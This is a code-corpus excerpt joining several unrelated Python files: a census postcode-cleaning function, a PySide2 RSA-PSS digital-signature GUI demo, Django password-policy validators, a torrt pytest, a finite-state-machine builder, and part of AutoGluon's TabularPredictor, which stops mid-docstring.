# Index level: 0=District; 1=Group; 2=Section; 3=Census_ID
logger.info(f"Fill invalid {invalid_type} postcodes with valid section postcodes from {fill_from}")
entity_type_label = scout_census.column_labels.UNIT_TYPE
valid_postcode_label = scout_census.column_labels.VALID_POSTCODE
# Gets all entity records matching the given criteria, and returns a
# minimal set of fields for memory optimisation
records = data.loc[data[entity_type_label].isin(entity_types), [valid_postcode_label, column_label, CLEAN_POSTCODE_LABEL]]
valid_postcodes_start = data[valid_postcode_label].to_numpy().sum()
# Get all valid clean postcodes from the filtered records. Then sort the
# index with census IDs high -> low. Then group the data by the passed
# index level. As the census IDs are sorted descending, the first item will
# be the newest possible clean postcode, indexed by the passed level.
firsts = records.loc[records[valid_postcode_label], CLEAN_POSTCODE_LABEL].sort_index(ascending=(True, True, True, False)).groupby(level=index_level).first()
# Map invalid postcodes to valid postcodes by the given ID type/field
clean_postcodes = records.loc[~records[valid_postcode_label], column_label].map(firsts)
# Merge in the changed postcodes and overwrite pre-existing postcodes in the Clean Postcode column
clean_postcodes_not_na = clean_postcodes.loc[clean_postcodes.notna()] # .update(*) uses not_na filter
data.loc[clean_postcodes_not_na.index, CLEAN_POSTCODE_LABEL] = clean_postcodes_not_na
# Update valid postcode status
data[valid_postcode_label] = data[CLEAN_POSTCODE_LABEL].isin(all_valid_postcodes)
logger.info(f"change in valid postcodes is: {data[valid_postcode_label].to_numpy().sum() - valid_postcodes_start}")
return data
|
<filename>guiMenu.py
import sys
from PySide2 import QtWidgets, QtCore
from gui import GuiDigitalSignature
from pki import Pki
from RsaPssSignature import RsaPssSignature
class GuiMenu:
def __init__(self, window):
self.pki = Pki()
self.rsa = RsaPssSignature()
self.rsaReceiver = RsaPssSignature()
self.email = ""
self.emailChanged = False
self.hashedMessage = ""
self.hashChanged = False
self.sendButtonCount = 0
# To make function called in sequences
window.guiSignal.emailReady.connect(self.emailReadyCall)
window.guiSignal.messageOnKeyPress.connect(self.messageOnKeyPressCall)
window.guiSignal.sendOnClicked.connect(self.sendOnClickedCall)
@QtCore.Slot(str)
def emailReadyCall(self, email):
self.DisplayKeys(email)
self.GenerateSignature()
@QtCore.Slot(str)
def messageOnKeyPressCall(self, message):
self.GenerateHash(message)
self.GenerateSignature()
@QtCore.Slot()
def sendOnClickedCall(self):
self.ReceiveSignatureDocument()
self.GetSenderPublicKey()
self.signedDocumentChangedCall(window.signedDocument.toPlainText())
# Call after sendOnClicked finished
if self.sendButtonCount == 0:
window.guiSignal.signedDocumentChanged.connect(self.signedDocumentChangedCall)
self.sendButtonCount += 1
@QtCore.Slot(str)
def signedDocumentChangedCall(self, signedDoc):
if self.ShowMessageSignature(signedDoc):
if self.GenerateReceiveHash(signedDoc):
if self.ShowReceiveSignature(signedDoc):
self.VerifySignatureReceived()
def DisplayKeys(self, email):
# To check whether user changed the email
# Used to prevent system from regenerate the signature when user click Send
# It is because emailReady Signal will be triggered everytime the Send button is clicked
if self.email != email:
self.email = email
self.emailChanged = True
else:
self.emailChanged = False
return
# To check whether the email entered is a new email
newEmail = False
if not self.pki.CheckEntryExists(email):
newEmail = True
# Get the keys from PKI
publicKey, self.privateKey = self.pki.CheckPair(email)
# convert to string type
publicKeyPEM = self.rsa.GetKeyInPEM(publicKey)
privateKeyPEM = self.rsa.GetKeyInPEM(self.privateKey)
# Set Text on the TextEdit fields
window.privateKey.setText(privateKeyPEM)
window.publicKey.setText(publicKeyPEM)
# if it is a new email, add an entry on PKI content area
if newEmail:
window.AddPkiEntry(email, publicKeyPEM)
def GenerateHash(self, message):
if self.rsa.SetMessage(message):
# Hash the message
self.rsa.HashMessage()
# Set the plaintext hash on the edit field
hashedMessage = self.rsa.GetHashedMessage()
window.hash.setText(hashedMessage)
# Generate signature based on hash
def GenerateSignature(self):
# check if message hash exists, if yes, then proceed, else return
# use to generate a new signature after user change the email
try:
hashedMessage = self.rsa.GetHashedMessage()
except AttributeError:
return
# To check whether user have changed the message
# Generate the signature when the message is changed
if self.hashedMessage != hashedMessage:
self.hashedMessage = hashedMessage
self.hashChanged = True
else:
self.hashChanged = False
# Used to prevent system from regenerate the signature when user click Send
# It is because emailReady Signal will be triggered everytime the Send button is clicked
# If hashChanged check is not exists, signature will not be regenerate as emailChanged is evaluate as False
# Here it generate the signature when hash is changed
if (self.emailChanged is False) and (self.hashChanged is False):
return
# sign the hash using private key
self.rsa.SignSignature(key = self.privateKey)
# set the plaintext signature on edit field
window.signature.setText(self.rsa.GetSignature())
def ReceiveSignatureDocument(self):
window.signedDocument.setText(self.rsa.GetSignedDocument())
def GetSenderPublicKey(self):
self.senderPublicKey = self.pki.GetPublicKey(self.email)
senderPublicKeyPEM = self.rsaReceiver.GetKeyInPEM(self.senderPublicKey)
window.senderPublic.setText(senderPublicKeyPEM)
def ShowMessageSignature(self, signedDoc):
# trim the message out from the signature document
message = self.rsaReceiver.GetMessageFromSignedDoc(signedDoc)
# check the format of the signature
if message:
window.signedDocument.setStyleSheet('background-color: white; ')
window.receiverMessage.setText(message)
self.rsaReceiver.SetMessage(message)
return True
else:
window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
window.signedDocument.setFocus()
window.receiverMessage.setText("")
window.receiveSignature.setText("")
window.generatedHash.setText("")
window.indicator.setText("")
window.indicator.setStyleSheet('background-color: white; ')
window.Alert("Incorrect Signature Document Format")
return False
def GenerateReceiveHash(self, signedDoc):
# Get the hashAlgo from "Hash: " section of the signed document
hashAlgo = self.rsaReceiver.GetHashAlgoFromSignedDoc(signedDoc)
# Check whether it is the supported hash function
if self.rsaReceiver.SetHashAlgo(hashAlgo):
window.signedDocument.setStyleSheet('background-color: white; ')
# Generate the hash value using the hashing function given
self.rsaReceiver.HashMessage()
# Set the plaintext hash on the edit field
hashedMessage = self.rsaReceiver.GetHashedMessage()
window.generatedHash.setText(hashedMessage)
return True
else:
window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
window.generatedHash.setText("")
window.indicator.setText("")
window.indicator.setStyleSheet('background-color: white; ')
window.Alert("Supported Hashing Function: \nSHA256, SHA384, SHA512, SHA1, MD5")
return False
@QtCore.Slot(str)
def ShowReceiveSignature(self, signedDoc):
signature = self.rsaReceiver.GetSignatureFromSignedDoc(signedDoc)
if signature:
window.signedDocument.setStyleSheet('background-color: white; ')
window.receiveSignature.setText(signature)
return True
else:
window.signedDocument.setStyleSheet('background-color: #ffcdd2; ')
window.signedDocument.setFocus()
window.receiveSignature.setText("")
window.indicator.setText("")
window.indicator.setStyleSheet('background-color: white; ')
window.Alert("Incorrect Signature Document Format")
return False
@QtCore.Slot()
def VerifySignatureReceived(self):
receiveSignature = window.receiveSignature.toPlainText()
try:
signatureByte = self.rsaReceiver.GetSignatureFromString(receiveSignature)
except __import__('binascii').Error as err:
signatureByte = False
if signatureByte:
signatureVerified = self.rsaReceiver.VerifySignature(signature = signatureByte, key = self.senderPublicKey)
else:
signatureVerified = False
if signatureVerified:
window.indicator.setStyleSheet('background-color: #a5d6a7; ')
window.indicator.setText("Signature Verified")
return True
else:
window.indicator.setStyleSheet('background-color: #ffcdd2; ')
window.indicator.setText("Invalid Signature")
return False
if __name__ == "__main__":
app = QtWidgets.QApplication([])
window = GuiDigitalSignature()
window.showMaximized()
menu = GuiMenu(window)
sys.exit(app.exec_()) |
"""Handle password rules."""
import re
import unicodedata
from django.contrib.auth.hashers import check_password
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from cpovc_access import BasePolicy
from cpovc_access.models import PasswordChange
def _normalize_unicode(value):
try:
value = unicodedata.normalize('NFKD', str(value))
return value.encode('ascii', 'ignore').strip().lower()
except UnicodeDecodeError:
return value
class PasswordStrengthPolicy(BasePolicy):
"""Password strength policy classes must implement.
`validate` a method which accept a password and the related user and raises
a validation error when the password doesn't validate the policy.
Optionally:
`policy_text` a property which returns a short text to be displayed in
password policy explenations
`policy_caption` a property which returns a short caption to be displayed
with the password policy.
"""
show_policy = True
def validate(self, value, user=None):
"""Validation text."""
raise NotImplemented()
@property
def policy_text(self):
"""Some policy text."""
return None
@property
def policy_caption(self):
"""Policy caption."""
return None
class PasswordMinLength(PasswordStrengthPolicy):
"""Class for minimum length password."""
min_length = 8
text = _('Passwords must be at least {min_length} characters in length.')
def validate(self, value, user=None):
"""Method to validate min pass length."""
if self.min_length is None:
return
if len(value) < self.min_length:
msg = self.text.format(min_length=self.min_length)
raise ValidationError(msg, code='password_min_length')
@property
def policy_text(self):
"""Method to return message."""
return self.text.format(min_length=self.min_length)
class PasswordContains(PasswordStrengthPolicy):
"""Base class which validates if passwords contain at least a certain.
number of characters from a certain set.
"""
chars = None
min_count = 1
text = None
plural_text = None
def validate(self, value, user=None):
"""Method to do the validation."""
pw_set = set(value)
if len(pw_set.intersection(self.chars)) < self.min_count:
raise ValidationError(self.text, 'password_complexity')
@property
def policy_text(self):
"""Some policy text."""
if self.min_count > 1:
return self.plural_text.format(min_count=self.min_count)
else:
return self.text.format(min_count=self.min_count)
@property
def policy_caption(self):
"""Some caption message."""
return self.chars
class PasswordContainsUpperCase(PasswordContains):
"""Class to handle upper case."""
chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
text = _('Passwords must have at least one uppercase character.')
plural_text = _('Passwords must have at least {min_count} '
'uppercase characters.')
class PasswordContainsLowerCase(PasswordContains):
"""Class to handle lower case."""
chars = 'abcdefghijklmnopqrstuvwxyz'
text = _('Passwords must have at least one lowecase character.')
plural_text = _('Passwords must have at least {min_count} '
'lowercase characters.')
class PasswordContainsNumbers(PasswordContains):
"""Class to handle Numbers."""
chars = '0123456789'
text = _('Passwords must have at least one number.')
plural_text = _('Passwords must have at least {min_count} '
'numbers.')
class PasswordContainsSymbols(PasswordContains):
"""Class to handle Symbols."""
chars = '!@#$%^&*()_+-={}[]:;"\'|\\,.<>?/~` '
text = _('Passwords must have at least one special character.')
plural_text = _('Passwords must have at least {min_count} special '
'characters (punctuation).')
class PasswordContainsAlphabetics(PasswordContains):
"""Class to handle alphabetics."""
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
text = _('Passwords must have at least one alphabetic character.')
plural_text = _('Passwords must have at least {min_count} '
'alphabetic characters.')
class PasswordUserAttrs(PasswordStrengthPolicy):
"""Validate if password doesn't contain values from a list of user.
attributes. Every attribute will be normalized into ascii and split
on non alphanumerics.
Use this in the clean method of password forms
`value`: password
`user`: user object with attributes
Example, which would raise a ValidationError:
user.first_name = 'John'
password_user_attrs('<PASSWORD>', user)
"""
user_attrs = ('email', 'first_name', 'last_name', 'username')
text = _('Passwords are not allowed to contain (pieces of) your name '
'or email.')
_non_alphanum = re.compile(r'[^a-z0-9]')
def validate(self, value, user=None):
"""Method to validate alphabetics."""
if user is None:
return
simple_pass = _normalize_unicode(value)
for attr in self.user_attrs:
v = getattr(user, attr, None)
if not attr or len(attr) < 4:
continue
v = _normalize_unicode(v)
for piece in self._non_alphanum.split(v):
if len(piece) < 4:
continue
if piece in simple_pass:
raise ValidationError(self.text, 'password_user_attrs')
@property
def policy_text(self):
"""Method to return policy text."""
return self.text
class PasswordDisallowedTerms(PasswordStrengthPolicy):
"""Disallow a (short) list of terms in passwords.
Ideal for too obvious terms like the name of the site or company
"""
terms = None
text = _('Passwords are not allowed to contain the following term(s): '
'{terms}.')
show_policy = False
def __init__(self, **kwargs):
"""Constructor for terms."""
terms = kwargs.pop('terms')
self.terms = [_normalize_unicode(term) for term in terms]
super(PasswordDisallowedTerms, self).__init__(**kwargs)
def validate(self, value, user=None):
"""Method to validate terms."""
simple_pass = _normalize_unicode(value)
found = []
for term in self.terms:
if term in simple_pass:
found.append(term)
if found:
msg = self.text.format(terms=u', '.join(found))
raise ValidationError(msg, 'password_disallowed_terms')
@property
def policy_text(self):
"""For users not to disobet terms."""
return self.text.format(terms=u', '.join(self.terms))
class PasswordLimitReuse(PasswordStrengthPolicy):
"""Limits reuse of previous passwords.
Use this to prevent users from reusing one of their previous passwords.
"""
max_pw_history = 3
text = _('New password must be different than your last password.')
plural_text = _('New password must not be one of your last '
'{max_pw_history} passwords.')
def validate(self, value, user=None):
"""Method to validate the limite re-use of passwords."""
if user is None:
return
last_pw_changes = PasswordChange.objects.filter(
user=user, successful=True).order_by('-id')[:self.max_pw_history]
for pw_change in last_pw_changes:
if check_password(value, pw_change.password):
raise ValidationError(self.policy_text, 'password_limit_reuse')
@property
def policy_text(self):
"""For users not to re-use passwords."""
if self.max_pw_history > 1:
return self.plural_text.format(max_pw_history=self.max_pw_history)
else:
return self.text.format(max_pw_history=self.max_pw_history)
|
<gh_stars>10-100
from os.path import dirname, realpath, join
from torrentool.torrent import Torrent
from torrt.base_rpc import BaseRPC
from torrt.base_tracker import GenericPublicTracker
from torrt.toolbox import bootstrap, TrackerClassesRegistry, NotifierClassesRegistry, RPCClassesRegistry, \
configure_rpc, configure_tracker, add_torrent_from_url, get_registered_torrents, walk, remove_torrent, toggle_rpc
from torrt.utils import RPCObjectsRegistry, TorrentData
CURRENT_DIR = dirname(realpath(__file__))
def test_basic():
assert TrackerClassesRegistry.get()
assert NotifierClassesRegistry.get()
assert RPCClassesRegistry.get()
class DummyTracker(GenericPublicTracker):
alias = 'dummy.local'
mirrors = ['dummy-a.local']
def get_download_link(self, url):
return url
TrackerClassesRegistry.add(DummyTracker)
class DummyRPC(BaseRPC):
alias = 'dummy'
def __init__(self, enabled=False):
self.enabled = enabled
self.torrents = {}
super().__init__()
def method_add_torrent(self, torrent: TorrentData, download_to: str = None, params: dict = None):
parsed = Torrent.from_string(torrent.raw)
self.torrents[parsed.info_hash] = parsed
def method_remove_torrent(self, hash_str, with_data=False):
self.torrents.pop(hash_str)
def method_get_torrents(self, hashes=None):
results = []
for hash_str, parsed in self.torrents.items():
if hash_str not in hashes:
continue
results.append({
'id': parsed.info_hash,
'name': parsed.name,
'hash': parsed.info_hash,
'download_to': None,
'comment': 'http://dummy-a.local/id/one',
})
return results
def method_get_version(self):
return '0.0.1'
def test_fullcycle(monkeypatch, datafix_dir):
# todo Dummy notifier
# todo Dummy bot
from torrt.utils import TorrtConfig
class DummyConfig(TorrtConfig):
cfg = TorrtConfig._basic_settings
@classmethod
def bootstrap(cls):
pass
@classmethod
def load(cls):
return cls.cfg
@classmethod
def save(cls, settings_dict):
cls.cfg = settings_dict
def patch_requests(response_contents):
monkeypatch.setattr('torrt.utils.Session.get', lambda self, url, **kwargs: DummyResponse(url, response_contents))
torrent_one_hash = 'c815be93f20bf8b12fed14bee35c14b19b1d1984'
torrent_one_data = (datafix_dir / 'torr_one.torrent').read_bytes()
torrent_two_hash = '65f491bbdef45a26388a9337a91826a75c4c59fb'
torrent_two_data = (datafix_dir / 'torr_two.torrent').read_bytes()
class DummyResponse(object):
def __init__(self, url, data):
self.url = url
self.data = data
@property
def content(self):
return self.data
patch_requests(torrent_one_data)
monkeypatch.setattr('torrt.utils.config', DummyConfig)
monkeypatch.setattr('torrt.toolbox.config', DummyConfig)
rpc_old = RPCObjectsRegistry._items
RPCObjectsRegistry._items = {}
try:
configure_tracker('dummy.local', {})
assert configure_rpc('dummy', {}).enabled
toggle_rpc('dummy') # Enable RPC in config.
bootstrap()
rpc_dummy = RPCObjectsRegistry.get('dummy')
# Add new torrent.
add_torrent_from_url('http://dummy-a.local/id/one')
assert len(rpc_dummy.torrents) == 1
assert torrent_one_hash in rpc_dummy.torrents
assert torrent_one_hash in get_registered_torrents()
# Walk and update.
patch_requests(torrent_two_data)
walk(forced=True)
assert len(rpc_dummy.torrents) == 1
assert torrent_two_hash in rpc_dummy.torrents
# Remove updated.
remove_torrent(torrent_two_hash)
assert not rpc_dummy.torrents
assert torrent_one_hash not in get_registered_torrents()
assert torrent_two_hash not in get_registered_torrents()
finally:
RPCObjectsRegistry._items = rpc_old
|
<filename>gfsm/fsm_builder/fsm_builder.py
import operation_loader
import sys
from gfsm.transition import Transition
from gfsm.event import Event
from gfsm.state import State
from ..action import fsm_action
class FsmBuilder():
def __init__(self, config, definition):
self.config = config
self.definition = definition
self.action_wrapper = fsm_action
@staticmethod
def is_correct_action_name(name):
if name and name.strip() and len(name) >= 3 and '.' in name:
return True
return False
@staticmethod
def get_value(data, key):
if key and key.strip() and key in data:
return data[key]
return ''
def set_runtime_environment(self):
user_actions_paths = self.get_value(self.config, 'user-actions-paths')
for path in user_actions_paths:
sys.path.append(path)
user_action_wrapper_path = self.get_value(self.config, 'user-action-wrapper-path')
if len(user_action_wrapper_path) > 1:
sys.path.append(user_action_wrapper_path)
user_action_wrapper_name = self.get_value(self.config, 'user-action-wrapper-name')
if self.is_correct_action_name(user_action_wrapper_name):
self.action_wrapper = operation_loader.get(user_action_wrapper_name)
# Load the action from actions implementation by name
def load_action(self, action_name):
if self.is_correct_action_name(action_name):
if action_name.startswith('____'):
# use defsult action's wrapper
action_name = action_name[4:]
return fsm_action(operation_loader.get(action_name))
return self.action_wrapper(operation_loader.get(action_name))
return None
def build_state(self, state_def, idx):
id = idx
name = self.get_value(state_def, 'name')
entry_action = self.load_action(self.get_value(state_def, 'entry-action'))
exit_action = self.load_action(self.get_value(state_def, 'exit-action'))
state = State(id, name)
state.entry_action = entry_action
state.exit_action = exit_action
return state
def build_transition(self, tr_def, states):
tr_name = self.get_value(tr_def, 'name')
tr_event = self.get_value(tr_def, 'event')
target = states[self.get_value(tr_def, 'target')]
tr_action = self.get_value(tr_def, 'action')
action = self.load_action(tr_action)
transition = Transition(tr_name, target, action)
if 'start-action' in tr_def:
tr_start_action = self.get_value(tr_def, 'start-action')
start_action = self.load_action(tr_start_action)
transition.start_action = start_action
if 'end-action' in tr_def:
tr_end_action = self.get_value(tr_def, 'end-action')
end_action = self.load_action(tr_end_action)
transition.end_action = end_action
# associate the event with Transition via State
src = states.get(self.get_value(tr_def, 'src'))
src.transitions[tr_event] = transition
return transition
def build_transitions(self, trs_def, states):
for tr_def in trs_def:
self.build_transition(tr_def, states)
return
def build(self):
self.set_runtime_environment()
print("FSM bulder. Build the fsm implementation from: {}".format(self.config['info']))
fsm_implementation = {}
# build events
events_def = self.config['events']
events = {}
for en in events_def:
events[en] = Event(en)
# build states
states_def = self.get_value(self.definition,'states')
states = {}
for i, state_def in enumerate(states_def):
state = self.build_state(state_def, i)
states[state.name] = state
# build transitions and sssociate events with Transition via State"
for state_def in states_def:
trs_def = self.get_value(state_def, 'transitions')
self.build_transitions(trs_def, states)
# get init action
init_action = self.load_action(self.get_value(self.definition, 'init-action'))
# Setup FSM implementation
fsm_implementation['init-action'] = init_action
fsm_implementation['events'] = events
fsm_implementation['first-state'] = states[self.get_value(self.definition, 'first-state')]
fsm_implementation['states'] = states
return fsm_implementation
|
<filename>autogluon/task/tabular_prediction/predictor.py
import logging
import pandas as pd
from .dataset import TabularDataset
from ..base.base_predictor import BasePredictor
from ...utils import plot_performance_vs_trials, plot_summary_of_models, plot_tabular_models, verbosity2loglevel
from ...utils.tabular.ml.constants import REGRESSION
from ...utils.tabular.ml.learner.default_learner import DefaultLearner as Learner
from ...utils.tabular.ml.utils import setup_outputdir
__all__ = ['TabularPredictor']
logger = logging.getLogger() # return root logger
class TabularPredictor(BasePredictor):
""" Object returned by `fit()` in Tabular Prediction tasks.
Use for making predictions on new data and viewing information about models trained during `fit()`.
Attributes
----------
output_directory : str
Path to directory where all models used by this Predictor are stored.
problem_type : str
What type of prediction problem this Predictor has been trained for.
eval_metric : function or str
What metric is used to evaluate predictive performance.
label_column : str
Name of table column that contains data from the variable to predict (often referred to as: labels, response variable, target variable, dependent variable, Y, etc).
feature_types : dict
Inferred data type of each predictive variable (i.e. column of training data table used to predict `label_column`).
model_names : list
List of model names trained during `fit()`.
model_performance : dict
Maps names of trained models to their predictive performance values attained on the validation dataset during `fit()`.
class_labels : list
For multiclass problems, this list contains the class labels in sorted order of `predict_proba()` output. Is = None for problems that are not multiclass.
For example if `pred = predict_proba(x)`, then ith index of `pred` provides predicted probability that `x` belongs to class given by `class_labels[i]`.
Examples
--------
>>> from autogluon import TabularPrediction as task
>>> train_data = task.Dataset(file_path='https://autogluon.s3-us-west-2.amazonaws.com/datasets/Inc/train.csv')
>>> predictor = task.fit(train_data=train_data, label='class')
>>> results = predictor.fit_summary()
>>> test_data = task.Dataset(file_path='https://autogluon.s3-us-west-2.amazonaws.com/datasets/Inc/test.csv')
>>> perf = predictor.evaluate(test_data)
"""
def __init__(self, learner):
""" Creates TabularPredictor object.
You should not construct a TabularPredictor yourself, it is only intended to be produced during fit().
Parameters
----------
learner : `AbstractLearner` object
Object that implements the `AbstractLearner` APIs.
To access any learner method `func()` from this Predictor, use: `predictor._learner.func()`.
To access any trainer method `func()` from this `Predictor`, use: `predictor._trainer.func()`.
"""
self._learner = learner # Learner object
self._trainer = self._learner.load_trainer() # Trainer object
self.output_directory = self._learner.path_context
self.problem_type = self._learner.problem_type
self.eval_metric = self._learner.objective_func
self.label_column = self._learner.label
self.feature_types = self._trainer.feature_types_metadata
self.model_names = self._trainer.get_model_names_all()
self.model_performance = self._trainer.model_performance
self.class_labels = self._learner.class_labels
def predict(self, dataset, model=None, as_pandas=False, use_pred_cache=False, add_to_pred_cache=False):
""" Use trained models to produce predicted labels (in classification) or response values (in regression).
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
The dataset to make predictions for. Should contain same column names as training Dataset and follow same format
(may contain extra columns that won't be used by Predictor, including the label-column itself).
If str is passed, `dataset` will be loaded using the str value as the file path.
model : str (optional)
The name of the model to get predictions from. Defaults to None, which uses the highest scoring model on the validation set.
as_pandas : bool (optional)
Whether to return the output as a pandas Series (True) or numpy array (False)
use_pred_cache : bool (optional)
Whether to used previously-cached predictions for table rows we have already predicted on before
(can speedup repeated runs of `predict()` on multiple datasets with overlapping rows between them).
add_to_pred_cache : bool (optional)
Whether these predictions should be cached for reuse in future `predict()` calls on the same table rows
(can speedup repeated runs of `predict()` on multiple datasets with overlapping rows between them).
Returns
-------
Array of predictions, one corresponding to each row in given dataset. Either numpy Ndarray or pandas Series depending on `as_pandas` argument.
"""
dataset = self.__get_dataset(dataset)
return self._learner.predict(X_test=dataset, model=model, as_pandas=as_pandas, use_pred_cache=use_pred_cache, add_to_pred_cache=add_to_pred_cache)
def predict_proba(self, dataset, model=None, as_pandas=False):
""" Use trained models to produce predicted class probabilities rather than class-labels (if task is classification).
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
The dataset to make predictions for. Should contain same column names as training Dataset and follow same format
(may contain extra columns that won't be used by Predictor, including the label-column itself).
If str is passed, `dataset` will be loaded using the str value as the file path.
model : str (optional)
The name of the model to get prediction probabilities from. Defaults to None, which uses the highest scoring model on the validation set.
as_pandas : bool (optional)
Whether to return the output as a pandas object (True) or numpy array (False).
Pandas object is a DataFrame if this is a multiclass problem, otherwise it is a Series.
Returns
-------
Array of predicted class-probabilities, corresponding to each row in the given dataset.
May be a numpy Ndarray or pandas Series/Dataframe depending on `as_pandas` argument and the type of prediction problem.
"""
dataset = self.__get_dataset(dataset)
return self._learner.predict_proba(X_test=dataset, model=model, as_pandas=as_pandas)
def evaluate(self, dataset, silent=False):
""" Report the predictive performance evaluated for a given Dataset.
This is basically a shortcut for: `pred = predict(dataset); evaluate_predictions(dataset[label_column], preds, auxiliary_metrics=False)`
that automatically uses `predict_proba()` instead of `predict()` when appropriate.
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame`
This Dataset must also contain the label-column with the same column-name as specified during `fit()`.
If str is passed, `dataset` will be loaded using the str value as the file path.
silent : bool (optional)
Should performance results be printed?
Returns
-------
Predictive performance value on the given dataset, based on the `eval_metric` used by this Predictor.
"""
dataset = self.__get_dataset(dataset)
perf = self._learner.score(dataset)
sign = self._learner.objective_func._sign
perf = perf * sign # flip negative once again back to positive (so higher is no longer necessarily better)
if not silent:
print("Predictive performance on given dataset: %s = %s" % (self.eval_metric, perf))
return perf
def evaluate_predictions(self, y_true, y_pred, silent=False, auxiliary_metrics=False, detailed_report=True):
""" Evaluate the provided predictions against ground truth labels.
Parameters
----------
y_true : list or `numpy.array`
The ordered collection of ground-truth labels.
y_pred : list or `numpy.array`
The ordered collection of predictions.
For certain types of `eval_metric` (such as AUC), `y_pred` must be predicted-probabilities rather than predicted labels.
silent : bool (optional)
Should performance results be printed?
auxiliary_metrics: bool (optional)
Should we compute other (`problem_type` specific) metrics in addition to the default metric?
detailed_report : bool (optional)
Should we computed more detailed versions of the `auxiliary_metrics`? (requires `auxiliary_metrics = True`)
Returns
-------
Scalar performance value if `auxiliary_metrics = False`.
If `auxiliary_metrics = True`, returns dict where keys = metrics, values = performance along each metric.
"""
return self._learner.evaluate(y_true=y_true, y_pred=y_pred, silent=silent,
auxiliary_metrics=auxiliary_metrics, detailed_report=detailed_report)
def leaderboard(self, dataset=None, silent=False):
"""
Output summary of information about models produced during fit() as a pandas DataFrame.
Includes information on test and validation scores for all models, model training times and stack levels.
Parameters
----------
dataset : str or :class:`TabularDataset` or `pandas.DataFrame` (optional)
This Dataset must also contain the label-column with the same column-name as specified during fit().
If specified, then the leaderboard returned will contain an additional column 'score_test'
'score_test' is the score of the model on the validation_metric for the dataset provided
If str is passed, `dataset` will be loaded using the str value as the file path.
silent: bool (optional)
Should leaderboard DataFrame be printed?
Returns
-------
Pandas `pandas.DataFrame` of model performance summary information.
"""
dataset = self.__get_dataset(dataset) if dataset is not None else dataset
return self._learner.leaderboard(X=dataset, silent=silent)
def fit_summary(self, verbosity=3):
"""
Output summary of information about models produced during `fit()`.
May create various generated summary plots and store them in folder: `Predictor.output_directory`.
Parameters
----------
verbosity : int, default = 3
Controls how detailed of a summary to ouput.
Set <= 0 for no output printing, 1 to print just high-level summary,
2 to print summary and create plots, >= 3 to print all information produced during fit().
Returns
-------
Dict containing various detailed information. We do not recommend directly printing this dict as it may be very large.
"""
hpo_used = len(self._trainer.hpo_results) > 0
model_typenames = {key: self._trainer.model_types[key].__name__ for key in self._trainer.model_types}
unique_model_types = set(model_typenames.values()) # no more class info
# all fit() information that is returned:
results = {
'model_types': model_typenames, # dict with key = model-name, value = type of model (class-name)
'model_performance': self.model_performance, # dict with key = model-name, value = validation performance
'model_best': self._trainer.model_best, # the name of the best model (on validation data)
'model_paths': self._trainer.model_paths, # dict with key = model-name, value = path to model file
'model_fit_times': self._trainer.model_fit_times,
'model_pred_times': self._trainer.model_pred_times,
'num_bagging_folds': self._trainer.kfolds,
'stack_ensemble_levels': self._trainer.stack_ensemble_levels,
'feature_prune': self._trainer.feature_prune,
'hyperparameter_tune': hpo_used,
'hyperparameters_userspecified': self._trainer.hyperparameters,
}
if self.problem_type != REGRESSION:
results['num_classes'] = self._trainer.num_classes
if hpo_used:
results['hpo_results'] = self._trainer.hpo_results
# get dict mapping model name to final hyperparameter values for each model:
model_hyperparams = {}
for model_name in results['model_performance']:
model_obj = self._trainer.load_model(model_name)
model_hyperparams[model_name] = model_obj.params
results['model_hyperparams'] = model_hyperparams
if verbosity > 0: # print stuff
print("*** Summary of fit() ***")
print("Number of models trained: %s" % len(results['model_performance']))
print("Types of models trained: ")
print(unique_model_types)
self._summarize('model_performance', 'Validation performance of individual models', results)
self._summarize('model_best', 'Best model (based on validation performance)', results)
self._summarize('hyperparameter_tune', 'Hyperparameter-tuning used', results)
num_fold_str = ""
bagging_used = results['num_bagging_folds'] > 0
if bagging_used:
num_fold_str = f" (with {results['num_bagging_folds']} folds)"
print("Bagging used: %s %s" % (bagging_used, num_fold_str))
num_stack_str = ""
stacking_used = results['stack_ensemble_levels'] > 0
if stacking_used:
num_stack_str = f" (with {results['stack_ensemble_levels']} levels)"
print("Stack-ensembling used: %s %s" % (stacking_used, num_stack_str))
# TODO: uncomment once feature_prune is functional: self._summarize('feature_prune', 'feature-selection used', results)
print("User-specified hyperparameters:")
print(results['hyperparameters_userspecified'])
if verbosity > 1: # create plots
plot_tabular_models(results, output_directory=self.output_directory,
save_file="SummaryOfModels.html",
plot_title="Models produced during fit()")
if hpo_used:
for model_type in results['hpo_results']:
plot_summary_of_models(
results['hpo_results'][model_type],
output_directory=self.output_directory, save_file=model_type + "_HPOmodelsummary.html",
plot_title=f"Models produced during {model_type} HPO")
plot_performance_vs_trials(
results['hpo_results'][model_type],
output_directory=self.output_directory, save_file=model_type + "_HPOperformanceVStrials.png",
plot_title=f"HPO trials for {model_type} models")
if verbosity > 2: # print detailed information
if hpo_used:
hpo_results = results['hpo_results']
print("*** Details of Hyperparameter optimization ***")
for model_type in hpo_results:
hpo_model = hpo_results[model_type]
print("HPO for %s model: Num. configurations tried = %s, Time spent = %s, Search strategy = %s"
% (model_type, len(hpo_model['trial_info']), hpo_model['total_time'], hpo_model['search_strategy']))
print("Best hyperparameter-configuration (validation-performance: %s = %s):"
% (self.eval_metric, hpo_model['validation_performance']))
print(hpo_model['best_config'])
"""
if bagging_used:
pass # TODO: print detailed bagging info
if stacking_used:
pass # TODO: print detailed stacking info, like how much it improves validation performance
if results['feature_prune']:
pass # TODO: print detailed feature-selection info once feature-selection is functional.
"""
if verbosity > 0:
print("*** End of fit() summary ***")
return results
@classmethod
def load(cls, output_directory, verbosity=2):
"""
Load a predictor object previously produced by `fit()` from file and returns this object.
Is functionally equivalent to :meth:`autogluon.task.tabular_prediction.TabularPrediction.load`.
Parameters
----------
output_directory : str
Path to directory where trained models are stored (i.e. the `output_directory` specified in previous call to `fit()`).
verbosity : int, default = 2
Verbosity levels range from 0 to 4 and control how much information is generally printed by this Predictor.
Higher levels correspond to more detailed print statements (you can set verbosity = 0 to suppress warnings).
If using logging, you can alternatively control amount of information printed via `logger.setLevel(L)`,
where `L` ranges from 0 to 50 (Note: higher values `L` correspond to fewer print statements, opposite of verbosity levels)
Returns
-------
